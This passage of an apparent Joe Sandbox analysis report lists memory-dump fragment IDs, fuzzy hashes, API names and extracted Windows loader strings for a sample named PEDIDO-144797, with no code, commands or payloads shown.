                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                          • Opcode ID: 140ba037ded93602cd8c4f5e6b18f4e9d7ff14638a0ab312eec2665ad64f9afd
                                                                                                                                          • Instruction ID: 3777ddc1803b2c249235c5a19375f8ec9848139816eb18b993428f39dadbaa68
                                                                                                                                          • Opcode Fuzzy Hash: 140ba037ded93602cd8c4f5e6b18f4e9d7ff14638a0ab312eec2665ad64f9afd
                                                                                                                                          • Instruction Fuzzy Hash: 91614BB1A103189FEB15CFA8C940BADB7B9FF48744F50406EE949EB251EB71E940CB94
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: $$$
                                                                                                                                          • API String ID: 3446177414-233714265
                                                                                                                                          • Opcode ID: 83735b0d0050d0dc71d679cc841b3f1a487daf999c75e1288faf86e3b953556b
                                                                                                                                          • Instruction ID: 055ced4d335e0b26caea9f493d549bb51689c333e16b705bbcb411ac291c54af
                                                                                                                                          • Opcode Fuzzy Hash: 83735b0d0050d0dc71d679cc841b3f1a487daf999c75e1288faf86e3b953556b
                                                                                                                                          • Instruction Fuzzy Hash: 39610FB5A01749DFEF24CFA6C580B9DB7F6FF44708F1044A9E5056B6A0CBB0A981CB85
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                          • API String ID: 0-118005554
                                                                                                                                          • Opcode ID: 3205649b301355433fdfec78ecfa4f2bbf72890c9da852d08a6d276c1986d0cb
                                                                                                                                          • Instruction ID: 113e44f3c9c3f10f0d54d61427bd067643720ae800c60c520902a61f2366a477
                                                                                                                                          • Opcode Fuzzy Hash: 3205649b301355433fdfec78ecfa4f2bbf72890c9da852d08a6d276c1986d0cb
                                                                                                                                          • Instruction Fuzzy Hash: 8F310F7520A7808BE322CF69D840B2AB3E5FF84714F080869F950CB381EBB0D945C7D2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: i2$ i2
                                                                                                                                          • API String ID: 0-1694335627
                                                                                                                                          • Opcode ID: 4d1c4a79ecd989dea6837e3602cb18b85ca33378eb612280d479fb512c8fe351
                                                                                                                                          • Instruction ID: 54c79c092b0af5820c0eb0c05e2295f254126abf42afb91bf40b8655470f3542
                                                                                                                                          • Opcode Fuzzy Hash: 4d1c4a79ecd989dea6837e3602cb18b85ca33378eb612280d479fb512c8fe351
                                                                                                                                          • Instruction Fuzzy Hash: 7631E1B6A04B51ABD716DE2488A0F9B7BA5EFC43A0F014529FC05A7310EE30DC15CFA6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .Local\$@
                                                                                                                                          • API String ID: 0-380025441
                                                                                                                                          • Opcode ID: 6ea35c91147758af5ebb1eba0839da6100f22ef5b07b51d9c7c991ba798e8c16
                                                                                                                                          • Instruction ID: 1ff11ef75560308daf4979dc9bd200a4c51dbfa4e360142d349cb85578571cd8
                                                                                                                                          • Opcode Fuzzy Hash: 6ea35c91147758af5ebb1eba0839da6100f22ef5b07b51d9c7c991ba798e8c16
                                                                                                                                          • Instruction Fuzzy Hash: CE317CB6909345AFD711CF28C9C0B9BBBE8EFC5694F40092EF99583250D634DD19CB92
                                                                                                                                          Strings
                                                                                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3271289A
                                                                                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3271289F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                          • API String ID: 0-2653619699
                                                                                                                                          • Opcode ID: 9e7fd8fbd23648082037b73262519d9e1216c7ff745d9d95a3b88fc42635882d
                                                                                                                                          • Instruction ID: debb83c0358d01c9cfcafb3c3153cc1f08514f31ab1bce08fbc45318678bf857
                                                                                                                                          • Opcode Fuzzy Hash: 9e7fd8fbd23648082037b73262519d9e1216c7ff745d9d95a3b88fc42635882d
                                                                                                                                          • Instruction Fuzzy Hash: 5F110676B00218ABF71A8A488D41F5A77A9EFC8754F208029B904AB244DA74ED1087A4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                          • Opcode ID: c3dc681ce247d170f377c0dfafc4abb2cb70412284713d6c50249b09aa0711bf
• Instruction ID: 1b6950da058b6c7e29828dd261218d57348b0258ede99024ed6e50084a7f2bc0
• Opcode Fuzzy Hash: c3dc681ce247d170f377c0dfafc4abb2cb70412284713d6c50249b09aa0711bf
• Instruction Fuzzy Hash: ED0144B2114744AFE311CF28CD00B1277E8FF40719F048A79E608C7690E730D904CB85
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
• Opcode ID: effa2496915d56f4f8914e40d6c3ed885b9371dea99c50e42d1fb73e88408a09
• Instruction ID: 82860eb8b5c34c78bb119c6a29c15b8284c7715668de1bc45aefa45b6dfa5849
• Opcode Fuzzy Hash: effa2496915d56f4f8914e40d6c3ed885b9371dea99c50e42d1fb73e88408a09
• Instruction Fuzzy Hash: F2825BB9E003088FEB14CFA9C9A0BEDB7B1FF49354F108169E859AB291DB709D41CB51
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a4cec4893b1e9640bd473d755fb770cc193d9c77b45092140fb138302c5865b
• Instruction ID: d282c8792b5cdad49d60c569e3d0cbe3274b009fa8ce897a5a2d83b43e7a8c77
• Opcode Fuzzy Hash: 8a4cec4893b1e9640bd473d755fb770cc193d9c77b45092140fb138302c5865b
• Instruction Fuzzy Hash: 33E17BB4609341CFDB08CF28C0A0A5ABBE1FF89358F158A6DE99587351DB71ED05CB92
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: @[y2@[y2
• API String ID: 0-1467358581
• Opcode ID: f9790bf9a1c2c53ddc38453686f2fc6a1730dc8274aefb93efb909ce78449762
• Instruction ID: e425acdfe390f4d8e0722d902607d1668bafa585061a3482e26d950f85bd593c
• Opcode Fuzzy Hash: f9790bf9a1c2c53ddc38453686f2fc6a1730dc8274aefb93efb909ce78449762
• Instruction Fuzzy Hash: 9132C0B5E41229DBDF18DFA8D880BAEBBB1FF44744F14412DE805AB390EB759901CB91
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 7424c9ea435a100fc783c84bab229820915619b454276f7145a664ea651e89ea
• Instruction ID: c0cf3143e60e1300e79d559852c014534a5a5715ebe879a99aa2263ec1e9994e
• Opcode Fuzzy Hash: 7424c9ea435a100fc783c84bab229820915619b454276f7145a664ea651e89ea
• Instruction Fuzzy Hash: A3B131B56093809FD754CF28C480A5AFBF1BF89708F1449AEF89987392D771E841CB82
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28ce9b11f9f60438e86ffdbbc998b401bc1b473f461e921c0a810055179c7d5f
• Instruction ID: 45ecb88d1b32d9c42fd07e75a7f8d03a4558b4245eddc2963a311890a7a8a9a3
• Opcode Fuzzy Hash: 28ce9b11f9f60438e86ffdbbc998b401bc1b473f461e921c0a810055179c7d5f
• Instruction Fuzzy Hash: 87615CB5A00606AFDB09CF69C490B9DFBB5BF88344F24826AD419A7310DB70AD51CF94
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 4c16f6ff5329a1f8ac2616eed0031a2d29c3e8044a583202a6d33b5a9beed5ec
• Instruction ID: 4389c5b996a85d72e289d3cc2eff05498b4ca7dc690d79dc24e491648c7858c3
• Opcode Fuzzy Hash: 4c16f6ff5329a1f8ac2616eed0031a2d29c3e8044a583202a6d33b5a9beed5ec
• Instruction Fuzzy Hash: 2A41F5B46043818FD714CF28ECA4B2AB7E9FF81394F50452DE9418B2A1DB70DC55CB92
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 1076979c839169d323d4c7310af34583b31d43270cee06409bd3e7ebef788479
• Instruction ID: 4be1182106325af302cb6dbac8de8aec5264d12757f280ca4fec503b96726b7d
• Opcode Fuzzy Hash: 1076979c839169d323d4c7310af34583b31d43270cee06409bd3e7ebef788479
• Instruction Fuzzy Hash: 08312F72640308AFC711CF14C880A9A77A9FF86BA4F10426EED059B2A1CF71ED42CBD4
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: ad1a8ea8a2fd1a0dff5955eaa77803401a5aba69e63e61abef192a6bb2974b70
• Instruction ID: a470403cfa0f512a441d7e1197c82c0c0371c8560a89107d778c94e090219fa2
• Opcode Fuzzy Hash: ad1a8ea8a2fd1a0dff5955eaa77803401a5aba69e63e61abef192a6bb2974b70
• Instruction Fuzzy Hash: 23319A79611A05FFEB5ACB64CAA0A59BBB6FF84354F409055EC009BA50CB71EC30CF80
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 92a520c8248e5f5f1e86df9e67cd81d2c418f486109d3ec1ccc69528d0747030
• Instruction ID: ddd93218d264583bada80af1f831ce25d85ccb1b654d0dc7d7d058523900455a
• Opcode Fuzzy Hash: 92a520c8248e5f5f1e86df9e67cd81d2c418f486109d3ec1ccc69528d0747030
• Instruction Fuzzy Hash: 4A3189B55153028FCB10CF1AC44094ABBE6FF89364F049AAEE4889F241EB30ED05CBD2
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: fccf3f629ada7caea1c0ed08b32dbe636232247baa2d2a7d8c65a90a307d54a1
• Instruction ID: 95c40f2d33adac5efb150557781f60080771e7a74637d7759bf2ed6bcd3fb488
• Opcode Fuzzy Hash: fccf3f629ada7caea1c0ed08b32dbe636232247baa2d2a7d8c65a90a307d54a1
• Instruction Fuzzy Hash: 89014936151259AFDF029E84C840EDA7F66FB4C7A4F058115FE186A220C636D971EB80
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 11305e70a390b8d6f1ef367ff1460e597d369232a014b86f12d2b9a949e1a682
• Instruction ID: 252f67c3984f83320dd4e9ea040ac7254ddc085a5799fa66cb25f828742e6634
• Opcode Fuzzy Hash: 11305e70a390b8d6f1ef367ff1460e597d369232a014b86f12d2b9a949e1a682
• Instruction Fuzzy Hash: 47F0FA32240700ABD7319B49CC04F8ABBEDEF80B00F040519A942931A0CAB0E90ACA64
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
• Instruction ID: 227609b54c5203c02c6b93dc19caa9b7da9e4328a0e18407fc407f569adaf439
• Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
• Instruction Fuzzy Hash: 6A617BB6D02219ABDB15CFA8C850BDEBBF5FF84714F204559E810AB250DBB4DE05CBA0
Strings
Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: #%u
                                                                                                                                          • API String ID: 0-232158463
                                                                                                                                          • Opcode ID: d82d2c36d499aa8161b95d8af916773519671ea38b2b9a044d017e71b9a2aba4
                                                                                                                                          • Instruction ID: 937ec6cb956b38fa8eca5b98644fe9dc3f564855d30b41f428827746757f8abe
                                                                                                                                          • Opcode Fuzzy Hash: d82d2c36d499aa8161b95d8af916773519671ea38b2b9a044d017e71b9a2aba4
                                                                                                                                          • Instruction Fuzzy Hash: 747179B5A0020A9FDB05CFA9C994BAEBBF8FF48704F144065E901EB251EB74E945CB64
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                          • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                          • Instruction ID: 59ca30bf86f8c1d5f1f0a06da9a610690b3d8265c5f87e08f486a2856ea83b7f
                                                                                                                                          • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                          • Instruction Fuzzy Hash: 6151C8B2605345AFE7228F15C940F6BB7E9FF84B54F40092DFA419B290DBB4E905CB92
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 0hy2
                                                                                                                                          • API String ID: 0-2709597722
                                                                                                                                          • Opcode ID: b1f0e10ea8b23a2041cd1eaaeb80e05bc1eab12e4311576d113455f56aca74da
                                                                                                                                          • Instruction ID: cfe2923a4be492bba6cb73274347051c6dfbf206941bbc408c676e415e668a37
                                                                                                                                          • Opcode Fuzzy Hash: b1f0e10ea8b23a2041cd1eaaeb80e05bc1eab12e4311576d113455f56aca74da
                                                                                                                                          • Instruction Fuzzy Hash: 694104B47002129BDB16CA69D895B7BB39BFF807ACF408218EC259F280DF74D809C690
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                          • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                          • Instruction ID: 50066fddffe319cc6ec667192938c1cc22be24c1d1d2e0402dda9505ff767459
                                                                                                                                          • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                          • Instruction Fuzzy Hash: 6651AD716017109FD324CF29C840A6BB7F9FF48710F00892EFA96976A0E7B4E904CB95
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: BinaryHash
                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                          • Opcode ID: 77c6dcbb81f8c1567a16c29fc49e00cb1eb538a883a6be3aa6ebc656b3d54480
                                                                                                                                          • Instruction ID: b0488969e71c8729461a7405ae06f6a5f2096c4524dd584f544e882721e6b65c
                                                                                                                                          • Opcode Fuzzy Hash: 77c6dcbb81f8c1567a16c29fc49e00cb1eb538a883a6be3aa6ebc656b3d54480
                                                                                                                                          • Instruction Fuzzy Hash: 6E4187B1D0112CABDB21CA90CD85FDE777DAF44714F0045E9EA09AB140DB70AE898FA9
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: i2
                                                                                                                                          • API String ID: 0-3902097018
                                                                                                                                          • Opcode ID: 6604e998762076b973f0276cbf5334d23e5e37b7e85d2c57a163ff7d81c51531
                                                                                                                                          • Instruction ID: 1ff1486f1ff90bbf07b9cf702b8f1a9d77173ebffc6b949de93d6c5e375d4850
                                                                                                                                          • Opcode Fuzzy Hash: 6604e998762076b973f0276cbf5334d23e5e37b7e85d2c57a163ff7d81c51531
                                                                                                                                          • Instruction Fuzzy Hash: C841CFB0600B01DFEB28CF29C890B16B7F9FF48348B504A6DD85687A50EB71EC56CB95
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: verifier.dll
                                                                                                                                          • API String ID: 0-3265496382
                                                                                                                                          • Opcode ID: 95328b252fa844fbfab780e990dd1d126743764b746905424ffbfb536f88d4f8
                                                                                                                                          • Instruction ID: cd5245b97eb5295ebce62f3caa68f6ecdb51fa6abc495e0074220b5a5529e406
                                                                                                                                          • Opcode Fuzzy Hash: 95328b252fa844fbfab780e990dd1d126743764b746905424ffbfb536f88d4f8
                                                                                                                                          • Instruction Fuzzy Hash: 7531B4B5700311EFE7148F6D9860B6773E6FB88754FA4846AEA08EF381EA718D81C754
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: #
                                                                                                                                          • API String ID: 0-1885708031
